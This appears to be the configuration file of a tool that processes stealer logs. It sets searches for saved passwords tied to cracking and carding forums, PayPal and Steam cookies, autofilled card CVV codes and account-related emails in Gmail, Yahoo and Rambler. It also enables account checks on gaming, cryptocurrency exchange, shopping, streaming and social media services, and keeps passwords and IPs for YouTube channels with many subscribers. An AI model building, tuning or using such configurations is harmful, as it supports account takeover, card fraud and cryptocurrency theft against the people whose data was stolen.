[====================SOFT====================]
LANG=RUS;
THEME=DARK;
THREADS=1;
RECHECK_ERRORS=1;
TIMEOUT=10000;

PasswordSearch="nulled.to;crax.pro;combo-list.net;mailaccess.top;cracked.io;cracking.org;cardingforum.cx;niflheim.top;xreactor.org;eternia.to;cracked.sx;selkis.online;forumteam.site;teamos-hkrg.com;fssquad.com;crackingx.com;patched.to;craxpro.io;911.re;mega.nz;mega.io"
CookiesSearch="paypal.com;steampowered.com"
AutofillsSearch="email;password;username;login;code;cvv;cvc"
PassSaveFullLog=0;
CookiesSaveFullLog=0;
CheckCVV=1;

[===============MAIL LATTER SEARCH===============]
GmailSearch="paypal.com;steampowered.com;epicgames.com;"
YahooSearch="paypal.com;steampowered.com;epicgames.com;"
RamblerSearch="paypal.com;steampowered.com;epicgames.com;"

[====================SERVICES====================]
Steam:check=1;change_timestamp=1;save_full_log=0;
Roblox:check=1;change_timestamp=0;save_full_log=0;
HumbleBundle:check=1;change_timestamp=0;save_full_log=0;
PSN:check=1;change_timestamp=0;save_full_log=0;
PathOfExile:check=1;change_timestamp=0;save_full_log=0;
Genshin:check=1;change_timestamp=0;save_full_log=0;
Tarkov:check=1;change_timestamp=0;save_full_log=0;
Freebitco.in:check=1;change_timestamp=0;save_full_log=0;
Coinbase:check=1;change_timestamp=0;save_full_log=0;
HitBTC:check=1;change_timestamp=0;save_full_log=0;
KuCoin:check=1;change_timestamp=0;save_full_log=0;
Kryptex:check=1;change_timestamp=0;save_full_log=0;
Poloniex:check=1;change_timestamp=0;save_full_log=0;
YouTube:check=1;change_timestamp=1;save_full_log=1;save_full_log_ytsubs>=500;save_passwords=1;save_ip=1;
Twitch:check=1;change_timestamp=0;save_full_log=0;save_full_log_twsubs>=0;
TikTok:check=1;change_timestamp=0;save_full_log=0;save_full_log_ttsubs>=0;
Instagram:check=1;change_timestamp=0;save_full_log=0;save_full_log_instsubs>=0;
Twitter:check=1;change_timestamp=0;save_full_log=0;save_full_log_twittersubs>=0;
Facebook:check=1;change_timestamp=0;save_full_log=0;
Amazon:check=1;change_timestamp=1;save_full_log=0;save_ip=0;
Netflix:check=1;change_timestamp=0;save_full_log=0;
WordPress:check=1;change_timestamp=0;save_full_log=0;
GooglePay:check=0;change_timestamp=0;save_full_log=0;
InstantGaming:check=1;change_timestamp=0;save_full_log=0;
Rambler:check=0;change_timestamp=0;save_full_log=1;
Yahoo:check=0;change_timestamp=0;save_full_log=1;
Gmail:check=0;change_timestamp=0;save_full_log=1;
FunPay:check=1;change_timestamp=0;save_full_log=0;
EpicGames:check=0;change_timestamp=0;save_full_log=0;
Stake:check=1;change_timestamp=0;save_full_log=0;